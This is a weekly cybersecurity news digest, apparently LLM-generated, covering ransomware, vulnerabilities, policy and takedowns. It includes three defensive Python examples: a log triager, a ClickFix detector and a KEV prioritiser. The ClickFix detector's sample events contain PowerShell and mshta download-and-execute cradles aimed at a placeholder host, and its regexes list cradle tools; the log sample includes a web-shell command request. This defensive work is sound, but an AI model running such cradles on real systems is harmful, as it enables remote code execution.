May 11, 2025

Cybersec Feeds Overview, May 5 - May 11, 2025

This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.

Most Discussed Topics

  • The role of Artificial Intelligence (AI) in cybersecurity is a dominant theme, with discussions spanning its use in offensive tactics like generating deepfakes and enhancing phishing, to defensive applications such as AI-powered threat detection, automated forensics, and scam prevention in browsers. Concerns also arise about AI-generated misinformation, the security of AI models themselves (like DeepSeek), and the challenges of ‘AI slop’ in bug bounty programs. The industry is exploring AI agents for various tasks, including red teaming and security operations, while also grappling with the ethical implications and the need for robust AI governance and security practices.
  • Ransomware continues to be a significant threat, with multiple strains like LockBit, Play, Akira, Nitrogen, and Mamona actively targeting organizations. High-profile incidents impacted UK retailers, healthcare (Ascension), and technology companies (Hitachi Vantara), leading to operational disruptions and data leaks. Reports highlight the prevalence of the Ransomware-as-a-Service (RaaS) model, threat actors exploiting zero-day vulnerabilities for privilege escalation (e.g., Play ransomware using CVE-2025-29824), and the concerning trend of re-extortion even after ransoms are paid, as seen with PowerSchool customers.
  • Vulnerabilities in Industrial Control Systems (ICS) and Operational Technology (OT) are frequently highlighted, with CISA releasing multiple advisories for products from Horner Automation, Hitachi Energy, Mitsubishi Electric, Optigo Networks, Milesight, and BrightSign. These vulnerabilities often allow for remote code execution, denial-of-service, or privilege escalation. Additionally, CISA warns about unsophisticated actors targeting ICS/SCADA systems in critical infrastructure sectors like Energy and Transportation, emphasizing the need for basic cyber hygiene and mitigation strategies to prevent significant operational disruptions or physical damage.
  • The CISA Known Exploited Vulnerabilities (KEV) catalog is regularly updated, indicating ongoing active exploitation of specific CVEs. Recently added vulnerabilities include OS command injection flaws in GeoVision Devices (CVE-2024-6047, CVE-2024-11120), a FreeType out-of-bounds write vulnerability (CVE-2025-27363), a Langflow missing authentication vulnerability (CVE-2025-3248), and two SonicWall SMA 100 series vulnerabilities (CVE-2023-44221, CVE-2024-38475). Federal Civilian Executive Branch (FCEB) agencies are mandated by BOD 22-01 to remediate these vulnerabilities by specified due dates, and CISA strongly urges all organizations to prioritize these patches.

Critical Vulnerabilities

  • Multiple vulnerabilities in SonicWall Secure Mobile Access (SMA) 100 series appliances, including CVE-2023-44221 (OS command injection) and CVE-2024-38475 (improper output escaping in Apache mod_rewrite), are actively exploited and can be chained for remote code execution. CISA added both to the KEV catalog. Separately, Rapid7 disclosed three further SMA 100 series flaws: CVE-2025-32819 (arbitrary file deletion as root), CVE-2025-32820 (path traversal that can make a directory writable), and CVE-2025-32821 (shell command injection), which can be chained for root-level RCE. SonicWall has released patches.
  • SAP NetWeaver Visual Composer (version 7.50) is affected by CVE-2025-31324, a critical (CVSS 10.0) unauthenticated file upload vulnerability. This allows remote code execution and full system compromise by sending crafted HTTP requests to the /developmentserver/metadatauploader endpoint. Attackers have been observed deploying web shells like helper.jsp and cache.jsp. Forescout linked recent exploitation activity to a Chinese threat actor (Chaya_004) using Chinese-language tools and infrastructure.
  • CISA added several actively exploited vulnerabilities to its KEV catalog. These include GeoVision Devices OS Command Injection vulnerabilities CVE-2024-6047 and CVE-2024-11120. Langflow is affected by CVE-2025-3248, a missing authentication vulnerability. FreeType has an out-of-bounds write vulnerability, CVE-2025-27363, which Google confirmed is under limited, targeted exploitation and impacts Android. Organizations are urged to patch these flaws promptly.
  • Multiple vulnerabilities affect Industrial Control Systems (ICS). Pixmeo OsiriX MD (medical imaging software) has Use After Free (CVE-2025-27578, CVE-2025-31946) and Cleartext Transmission of Sensitive Information (CVE-2025-27720) vulnerabilities, leading to DoS or credential theft. Horner Automation Cscape (control system software) has an Out-of-bounds Read flaw (CVE-2025-4098) allowing information disclosure and RCE. Hitachi Energy RTU500 series devices are vulnerable to XSS (CVE-2023-5767, CVE-2023-5769) and DoS (CVE-2023-5768).
  • Additional ICS vulnerabilities disclosed by CISA include: Mitsubishi Electric CC-Link IE TSN products (CVE-2025-3511) which can suffer a DoS via crafted UDP packets. Optigo Networks ONS NC600 (CVE-2025-4041) contains hard-coded SSH credentials allowing OS command execution. BrightSign Players (CVE-2025-3925) have an unnecessary privileges flaw leading to privilege escalation. Milesight UG65-868M-EA industrial gateway (CVE-2025-4043) has an improper access control flaw allowing admin users to inject shell commands via /etc/rc.local.
  • A Windows privilege escalation zero-day (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) was exploited by attackers linked to the Play ransomware prior to its patch on April 8, 2025. The attackers deployed the Grixba infostealer, a tool associated with the Balloonfly group (Play ransomware operators). Initial access may have been via a public-facing Cisco ASA firewall. This highlights the risk of zero-days being used in ransomware campaigns for privilege escalation.
  • Several vulnerabilities have been identified in Microsoft Azure services and related products. Azure is affected by CVE-2025-33072 (Information Disclosure in msagsfeedback.azurewebsites.net), CVE-2025-29972 (Spoofing in Storage Resource Provider via SSRF), and CVE-2025-29827 (Elevation of Privilege in Azure Automation). Azure DevOps has an EoP flaw (CVE-2025-29813) where pipeline job tokens are improperly handled. Microsoft Power Apps has an SSRF information disclosure vulnerability (CVE-2025-47733), and Microsoft Dataverse is vulnerable to RCE (CVE-2025-47732). Additionally, a use-after-free in Chromium WebAudio (CVE-2025-4372) affects Microsoft Edge.
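A first triage step for the SAP NetWeaver Visual Composer item above, as an added example rather than code from SAP, the advisory, or any of the sources summarised here: it walks a web-server access log, flags every request to the /developmentserver/metadatauploader endpoint and to the web-shell names reported in the wild, and produces a per-source-IP verdict. It assumes NCSA common log format (an SAP ICM or reverse-proxy log needs its own regex); the log lines are constructed with RFC 5737 documentation addresses, and the rule that a JSP fetched by a client which already uploaded is "probably a new shell" is this example's own heuristic, not something the reporting states.

```python
"""Triage web-server access logs for CVE-2025-31324 indicators (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

UPLOADER_PATH = "/developmentserver/metadatauploader"   # endpoint named in the advisory
KNOWN_SHELLS = {"helper.jsp", "cache.jsp"}              # web-shell names seen in the wild

# NCSA common log format; assumption: adapt for SAP ICM or proxy log formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/May/2025:09:14:01 +0000] "GET /irj/portal HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/May/2025:09:14:05 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 812',
    '203.0.113.7 - - [06/May/2025:09:14:09 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 0',
    '203.0.113.7 - - [06/May/2025:09:14:15 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 64',
    '203.0.113.7 - - [06/May/2025:09:15:40 +0000] "GET /irj/tmp.jsp HTTP/1.1" 200 31',
    '198.51.100.4 - - [06/May/2025:11:02:00 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 401 0',
    '192.0.2.9 - - [06/May/2025:11:30:12 +0000] "GET /irj/go/km/docs/index.jsp HTTP/1.1" 200 2048',
]


@dataclass
class Hit:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    reason: str


def triage(lines):
    """Return one Hit per suspicious request, in log order."""
    hits = []
    uploaded = set()   # IPs whose POST to the uploader got a non-error response
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # unparseable line: skip it rather than abort the run
        ip, method, status, path = m["ip"], m["method"], int(m["status"]), m["path"]
        bare = path.partition("?")[0].lower()
        name = bare.rsplit("/", 1)[-1]
        reason = None
        if bare.startswith(UPLOADER_PATH):
            # Any external traffic to this endpoint deserves a look; a POST is an upload attempt.
            reason = "uploader-post" if method == "POST" else "uploader-probe"
            if method == "POST" and status < 400:
                uploaded.add(ip)
        elif name in KNOWN_SHELLS:
            reason = "known-shell"
        elif bare.endswith(".jsp") and ip in uploaded:
            # Heuristic (assumption): a JSP fetched by a client that already uploaded is likely a new shell.
            reason = "post-upload-jsp"
        if reason:
            hits.append(Hit(ip, m["ts"], method, path, status, reason))
    return hits


def verdicts(hits):
    """Collapse hits into one short verdict per source IP."""
    tags_by_ip = defaultdict(set)
    for h in hits:
        tags_by_ip[h.ip].add(h.reason)
    out = {}
    for ip, tags in tags_by_ip.items():
        if tags & {"known-shell", "post-upload-jsp"}:
            out[ip] = "likely compromised"      # pull the portal web root and diff for new JSP files
        elif "uploader-post" in tags:
            out[ip] = "upload attempted"        # confirm patch level, inspect the upload target
        else:
            out[ip] = "probed"                  # scanner or recon; watch for follow-up
    return out


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(f"{h.ts} {h.ip} {h.method} {h.path} {h.status} -> {h.reason}")
    print(verdicts(found))
```

Run it against the real log with `triage(open(path).read().splitlines())`; a "likely compromised" verdict means the host should be treated as breached regardless of patch status, since the web shell survives patching.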

Major Incidents

  • Several major UK retailers, including Co-op, Harrods, and Marks & Spencer (M&S), experienced significant cyberattacks disrupting operations and compromising sensitive data. These attacks are suspected to be linked to the Scattered Spider gang, with the DragonForce ransomware group also claiming responsibility. The incidents have prompted the NCSC to issue recommendations, particularly focusing on IT helpdesk impersonation tactics used by attackers.
  • Ascension, a major US non-profit healthcare system, disclosed a data breach affecting over 430,000 patients, stemming from a third-party hacking incident in December 2024 potentially linked to the Cl0p ransomware exploiting a Cleo software vulnerability. Exposed data includes PHI and PII like SSNs. This follows a previous Black Basta ransomware attack on Ascension in May 2024 which impacted 5.6 million individuals and was initiated by an employee downloading a malicious file.
  • PowerSchool, an education technology vendor, suffered a ransomware attack in December 2024 and paid a ransom. However, attackers are now re-extorting PowerSchool’s customers, including the Toronto District School Board (TDSB) and at least three other school boards, by threatening to leak data stolen in the original breach. The initial breach exposed data of millions of students and teachers. The ShinyHunters group is reportedly linked to these attacks.
  • The LockBit ransomware group reportedly suffered a breach of its dark web infrastructure. An attacker defaced LockBit’s affiliate panels and leaked a MySQL database dump containing nearly 60,000 Bitcoin addresses used for ransom payments, negotiation chats with victims from December 2024 to April 2025, custom ransomware builds, and affiliate/admin credentials in plaintext. This follows previous law enforcement actions against the group.
  • Hitachi Vantara, a subsidiary of Hitachi, was targeted by the Akira ransomware gang. The attackers allegedly stole files from the company’s network and left ransom notes on compromised machines, leading to disruption of some systems. This incident adds to the growing list of enterprises falling victim to Akira ransomware operations.
  • The ByBit cryptocurrency exchange suffered a massive hack in February 2025, resulting in the theft of approximately $1.46 billion (around 400,000 ETH). The attack is attributed to North Korea’s TraderTraitor (Lazarus Group). A significant portion of the stolen funds, estimated at over $200 million, was reportedly laundered through the eXch cryptocurrency mixer, which has since been shut down by German authorities.
  • The student engagement platform iClicker’s website was compromised between April 12-16, 2025, in a ClickFix attack. Attackers used a fake CAPTCHA prompt to trick students and instructors into copying and executing malicious PowerShell scripts. This allowed threat actors to gain full access to infected devices, likely deploying infostealers to capture credentials, cookies, and other sensitive data. The specific malware payload varied based on the visitor.

Emerging Threats

  • Unsophisticated cyber actors are increasingly targeting Industrial Control Systems (ICS) and SCADA systems within U.S. critical infrastructure, particularly in Energy and Transportation. CISA notes that while these actors often use basic intrusion techniques, poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences like defacement, operational disruptions, or physical damage. Organizations are urged to implement primary mitigations for OT environments.
  • A new .NET malware obfuscation technique involves hiding malicious payloads, such as Agent Tesla or XLoader, within bitmap resources embedded in benign-looking 32-bit .NET applications. This steganographic approach initiates a multi-stage chain to extract, deobfuscate, load, and execute secondary DLL payloads, ultimately detonating the final malware. This method was observed in malspam campaigns targeting financial and logistics sectors, often using procurement-themed lures.
  • The Inferno Drainer, a sophisticated Drainer-as-a-Service crypto scam, remains operational despite an announced shutdown in late 2023. Recent campaigns show technical upgrades and infrastructure improvements, including using single-use smart contracts, on-chain encrypted configurations, and proxy-based communication to bypass wallet security and anti-phishing measures. A recent campaign abused Discord, redirecting users from a legitimate Web3 site to a fake bot and then a phishing site to sign malicious transactions, victimizing over 30,000 wallets and causing at least $9 million in losses in the last six months.
  • A new infostealer malware named Noodlophile is being distributed through fake AI-powered video generation tools advertised on Facebook. Victims are lured by promises of free AI video generation, but instead download a ZIP archive containing the Noodlophile Stealer. This malware, linked to Vietnamese-speaking operators and sold on dark web forums, targets browser credentials, cookies, tokens, and cryptocurrency wallets, exfiltrating data via Telegram. It may also bundle XWorm RAT for enhanced data theft.
  • Threat actors are leveraging Facebook ads and impersonating well-known cryptocurrency exchanges (like Binance, TradingView) and celebrities to distribute malware. This multi-stage campaign uses cleverly disguised front-end scripts and custom payloads. Users are lured to fake exchange websites to download a ‘desktop client,’ which is malware that establishes a local .NET-based server for C2 communication, eventually executing PowerShell scripts to download further malware. Advanced anti-sandbox checks and targeted ad delivery are used.
  • A suspected Iranian espionage operation, possibly linked to Agent Serpens (APT35/Charming Kitten), is impersonating a German model agency. The fraudulent website mimics the real agency’s branding and hosts obfuscated JavaScript to collect visitor data, including browser details, IP addresses, and screen resolution, likely for selective targeting. The site features a fake model profile with an inactive link to a private album, suggesting preparations for targeted social engineering attacks, potentially initiated via spear phishing.
  • The Lampion banking malware is being distributed in a new campaign targeting Portuguese organizations, especially in government, finance, and transportation sectors. This campaign utilizes the ClickFix social engineering technique, where victims are lured by fake error messages or prompts to copy and execute malicious PowerShell commands to supposedly fix issues. The attack chain involves multiple highly obfuscated Visual Basic (VB) scripts and exhibits similarities to previous Lampion activity in terms of C2 infrastructure and TTPs.
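The iClicker and Lampion items above both rely on ClickFix: the victim pastes an attacker-supplied command into the Run box or a terminal, so the first thing a defender sees is a scripting host spawned from explorer.exe with a download-and-execute one-liner. The scorer below is an added example, not a published detection rule from any vendor or source in this brief. It takes process-creation events shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), decodes a PowerShell -EncodedCommand argument so obfuscated cradles are scored on their plaintext, and adds up weighted indicators. The events are constructed, the weights and threshold are this example's own tuning, and example.invalid is a reserved name.

```python
"""Score process-creation events for ClickFix-style launches (added example)."""
import base64
import re

# Interpreters a ClickFix lure typically asks the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# The Win+R Run box and the Explorer address bar both spawn children from explorer.exe.
RUN_BOX_PARENTS = {"explorer.exe"}

# (weight, pattern); weights are this example's tuning, not a published rule.
PATTERNS = {
    "download-cradle": (2, re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|curl|wget)\b", re.I)),
    "eval": (2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    "hidden-window": (1, re.compile(r"-(w|win|windowstyle)\s+hidden", re.I)),
    "mshta-url": (3, re.compile(r"mshta(\.exe)?\s+[\"']?https?://", re.I)),
    "url": (1, re.compile(r"https?://", re.I)),
}
WEIGHT_ENCODED = 1
WEIGHT_RUN_BOX = 2
ALERT_THRESHOLD = 4

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand carries base64 of UTF-16LE; return the plaintext or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score(event):
    """Return (score, tags) for one process-creation event."""
    if basename(event["Image"]) not in INTERPRETERS:
        return 0, []
    text = event["CommandLine"]
    total, tags = 0, []
    decoded = decode_encoded_command(text)
    if decoded:
        total += WEIGHT_ENCODED
        tags.append("encoded-command")
        text = text + "\n" + decoded          # scan the decoded script as well
    for tag, (weight, rx) in PATTERNS.items():
        if rx.search(text):
            total += weight
            tags.append(tag)
    if basename(event["ParentImage"]) in RUN_BOX_PARENTS:
        total += WEIGHT_RUN_BOX
        tags.append("spawned-from-explorer")
    return total, tags


def alerts(events, threshold=ALERT_THRESHOLD):
    """Return the events whose score reaches the threshold, with their evidence."""
    out = []
    for ev in events:
        s, tags = score(ev)
        if s >= threshold:
            out.append({"score": s, "tags": tags, "cmd": ev["CommandLine"]})
    return out


# Constructed sample events (Sysmon Event ID 1 field names, made-up values).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr -useb https://example.invalid/v.txt | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -NoP -EncodedCommand {_ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign scheduled job
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
]

if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print(a["score"], a["tags"], a["cmd"][:60])
```

The parent-process weight is what separates a ClickFix victim from an administrator running the same cradle from a terminal; if your EDR exposes the RunMRU registry key or clipboard events, those are stronger signals for the same step and can replace it.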

Regulatory and Policy Updates

  • The UK’s National Cyber Security Centre (NCSC) and the Department for Science, Innovation and Technology have published a new voluntary ‘Software Security Code of Practice’. This code sets out expectations for the security and resilience of software, accompanied by implementation guidance from the NCSC. This initiative aims to improve software security standards among developers and organizations.
  • The UK government is advancing its move away from traditional passwords, with the NCSC announcing plans to roll out passkey technology across government digital services as an alternative to SMS-based verification. The NCSC has also joined the FIDO Alliance, signalling a strong commitment to adopting more secure authentication methods. This aligns with broader efforts to enhance cybersecurity for public services.
  • A new Cyber Security Certification Scheme has been announced by IASME and the UK Ministry of Defence to improve resilience throughout the UK Defence supply chain. This scheme introduces a comprehensive cybersecurity framework for defence suppliers, aiming to enhance security and future prosperity. This reflects a growing emphasis on securing supply chains within critical sectors.
  • CISA’s Known Exploited Vulnerabilities (KEV) Catalog, established under Binding Operational Directive (BOD) 22-01, mandates Federal Civilian Executive Branch (FCEB) agencies to remediate listed vulnerabilities by specific due dates. While this directive applies to FCEB agencies, CISA strongly urges all organizations to prioritize timely remediation of these actively exploited vulnerabilities as part of their standard vulnerability management practices to reduce cyberattack exposure.
  • The PCI DSS 4.0.1 standard is now the sole reference for all companies handling payment card data, effective April 2025. This updated version mandates requirements previously considered best practices, including extended multi-factor authentication (MFA) for all non-console access to card data environments, enhanced password policies (e.g., 12-character minimum), continuous monitoring of payment pages, and maintaining a software bill of materials (SBOM). This evolution aims to address modern technologies and emerging risks in the payment ecosystem.
  • The European Commission is establishing a Health Cybersecurity Advisory Board as part of the European Action Plan on the Cybersecurity of Hospitals and Healthcare Providers. This board, co-led by ENISA, aims to facilitate public-private cooperation and advise on impactful actions to enhance cybersecurity in the EU healthcare sector. Applications for board membership are now open to qualifying individuals and Health-ISAC members.
  • A bipartisan US Senate bill proposes to ban federal contractors from using the Chinese-made Large Language Model (LLM) DeepSeek for any activity related to federal contracts. Citing national security concerns about sensitive federal data potentially being accessed by the Chinese government, the bill also mandates a Commerce Department report on threats posed by AI platforms from countries of concern. This reflects growing legislative efforts to scrutinize and restrict foreign AI technologies in government use.
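The KEV items in this brief (the additions listed under Most Discussed Topics and the BOD 22-01 note above) are only useful if findings are actually joined against the catalog and its due dates. The script below is an added example of that join, not a CISA tool: it loads a KEV-shaped JSON document, matches a scanner export against it, and orders the results with overdue entries first and ransomware-linked CVEs ahead of ties. KEV_SAMPLE copies the field names of the public feed (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse) and uses CVE IDs from this brief, but its dates and ransomware flags are placeholders constructed for the example, not CISA's actual values; FINDINGS is a constructed scanner export.

```python
"""Prioritise scanner findings against a KEV-format catalog (added example)."""
import json
from datetime import datetime

# KEV-shaped sample. Field names match the public feed; dates/flags are placeholders.
KEV_SAMPLE = json.dumps({
    "catalogVersion": "example",
    "vulnerabilities": [
        {"cveID": "CVE-2025-29824", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2025-04-08", "dueDate": "2025-04-29", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2023-44221", "vendorProject": "SonicWall", "product": "SMA 100",
         "dateAdded": "2025-05-01", "dueDate": "2025-05-22", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-3248", "vendorProject": "Langflow", "product": "Langflow",
         "dateAdded": "2025-05-05", "dueDate": "2025-05-26", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2024-6047", "vendorProject": "GeoVision", "product": "Devices",
         "dateAdded": "2025-05-07", "dueDate": "2025-05-28", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed scanner export: one row per (host, CVE).
FINDINGS = [
    {"host": "sma-edge-01", "cve": "CVE-2023-44221"},
    {"host": "ws-0412", "cve": "CVE-2025-29824"},
    {"host": "ws-0413", "cve": "CVE-2025-29824"},
    {"host": "ml-dev-02", "cve": "CVE-2025-3248"},
    {"host": "cam-lobby", "cve": "CVE-2024-6047"},
    {"host": "intranet-01", "cve": "CVE-2024-9999"},   # not in the catalog
]


def load_kev(text):
    """Index a KEV-format JSON document by CVE ID."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def _day(iso):
    return datetime.strptime(iso, "%Y-%m-%d").date()


def prioritise(findings, kev, today_iso):
    """Annotate each finding with its KEV status and return them in remediation order."""
    today = _day(today_iso)
    rows = []
    for f in findings:
        entry = kev.get(f["cve"])
        if entry is None:
            rows.append({**f, "in_kev": False, "days_to_due": None,
                         "ransomware": False, "status": "not in KEV"})
            continue
        delta = (_day(entry["dueDate"]) - today).days
        status = f"overdue by {-delta} days" if delta < 0 else f"due in {delta} days"
        rows.append({**f, "in_kev": True, "days_to_due": delta,
                     "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                     "status": status})
    # Catalog entries first, most overdue first, ransomware-linked ahead of ties, then by host.
    rows.sort(key=lambda r: (not r["in_kev"],
                             r["days_to_due"] if r["days_to_due"] is not None else float("inf"),
                             not r["ransomware"],
                             r["host"]))
    return rows


def overdue_hosts(rows):
    """Hosts that still carry a catalog entry past its due date."""
    return sorted({r["host"] for r in rows if r["in_kev"] and r["days_to_due"] < 0})


if __name__ == "__main__":
    ordered = prioritise(FINDINGS, load_kev(KEV_SAMPLE), "2025-05-11")
    for r in ordered:
        flag = " [ransomware]" if r["ransomware"] else ""
        print(f"{r['host']:12} {r['cve']:15} {r['status']}{flag}")
    print("overdue:", overdue_hosts(ordered))
```

Against the live feed, replace KEV_SAMPLE with the downloaded catalog JSON and FINDINGS with your scanner's export; the BOD 22-01 due dates only bind FCEB agencies, but the same ordering is a sensible default for anyone, and the "not in KEV" tail is where ordinary CVSS-based prioritisation takes over.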

Security Operations

  • Google Chrome is introducing an on-device AI feature using the Gemini Nano LLM to detect and block tech support scams, starting with Chrome 137. This local analysis allows Chrome to identify suspicious page behaviors characteristic of scams, like keyboard lock API usage, and send signals to Safe Browsing for a final verdict, triggering a warning if malicious intent is confirmed. This aims to provide real-time protection against short-lived malicious sites while preserving performance and privacy, initially for Enhanced Protection users.
  • Cisco XDR is integrating automated forensics into its detection and response workflow. This new capability aims to capture forensic evidence (memory, processes, file data) automatically upon detection of suspicious events. The collected artifacts will enrich incident timelines, and AI-powered summarization will interpret findings and suggest root causes and response actions, streamlining investigations and reducing reliance on manual DFIR processes.
  • The UK NCSC is launching new assurance initiatives to enhance cyber resilience. These include establishing an ecosystem of assured Cyber Resilience Test Facilities for vendors to demonstrate product resilience and a Cyber Adversary Simulation scheme, set to launch in summer, to help organizations test their defenses. Additionally, NCSC is piloting an Assured Cyber Security Consultancy for post-quantum cryptography (PQC) to ensure competent advice and build market capacity for PQC migration.
  • Microsoft is enhancing security in Teams by introducing a feature to block screen captures during meetings. If a user attempts a screen capture, the meeting window will turn black to protect sensitive information. This feature is planned for rollout in July 2025 for Teams desktop (Windows, Mac) and mobile (iOS, Android) applications. Users on unsupported platforms may be placed in audio-only mode.
  • Exposure management is presented as an evolution of traditional vulnerability management, aiming to unify disparate security data and provide a holistic view of an organization’s risk landscape. This approach helps contextualize vulnerabilities with other exposures like misconfigurations and identity risks, enabling better prioritization and more efficient remediation. Platforms supporting exposure management should offer broad integrations to ingest data from various security tools, breaking down operational silos.
  • Health-ISAC is actively promoting cybersecurity best practices and collaboration, particularly for resource-constrained organizations like small and rural hospitals. They offer resources such as white papers on AI and digital identity for CISOs, and events like the Americas Hobby Exercise to foster public-private partnerships. The emphasis is on maintaining software updates, regular backups, and adopting robust security measures to safeguard patient data and safety, especially with the rise of remote monitoring technologies.
  • The curl project is experiencing a deluge of low-quality, AI-generated vulnerability reports, particularly from platforms like HackerOne. Founder Daniel Stenberg stated they are effectively being DDoSed by “AI slop” and will now ask reporters to verify if AI was used, potentially banning those submitting such reports. This highlights a growing problem where AI tools generate voluminous but often invalid security findings, wasting open-source maintainers’ time.

Wins

  • An international law enforcement operation involving the U.S. DOJ, Netherlands, and Thailand, has dismantled the Anyproxy and 5socks botnets. These services, operational for over 20 years, infected thousands of end-of-life wireless routers worldwide, selling access to them as residential proxies for illicit activities and allegedly amassing over $46 million. Four foreign nationals (three Russian, one Kazakhstani) have been indicted for their roles in operating these botnets.
  • German authorities, including the BKA and Frankfurt’s Public Prosecutor’s Office, have shut down the eXch cryptocurrency mixing platform. The operation involved seizing its German server infrastructure, over 8 terabytes of data, and crypto assets worth approximately $38.2 million. eXch was allegedly used to launder significant amounts of illicit funds, including over $200 million from the $1.46 billion ByBit hack attributed to North Korea’s Lazarus Group.
  • WhatsApp, owned by Meta, won a significant legal victory against Israeli spyware vendor NSO Group. A U.S. federal jury ordered NSO Group to pay nearly $168 million in damages ($167.3M punitive, $444k compensatory) for using its Pegasus spyware to infect approximately 1,400 WhatsApp users in 2019. This ruling is seen as a critical deterrent to the spyware industry and a win for digital privacy.
  • Operation PowerOFF, a multinational law enforcement effort supported by Europol, has led to the seizure of six DDoS-for-hire (booter/stresser) service websites: Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut. Four administrators were arrested in Poland. This operation is part of a larger initiative to disrupt the infrastructure underpinning DDoS-for-hire markets, with U.S. authorities also seizing nine additional domains linked to similar services.

Disclaimer

The summaries in this brief are generated autonomously by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

This document is created by BlackStork and is based on the template available on GitHub.

Reach out if you have questions or suggestions.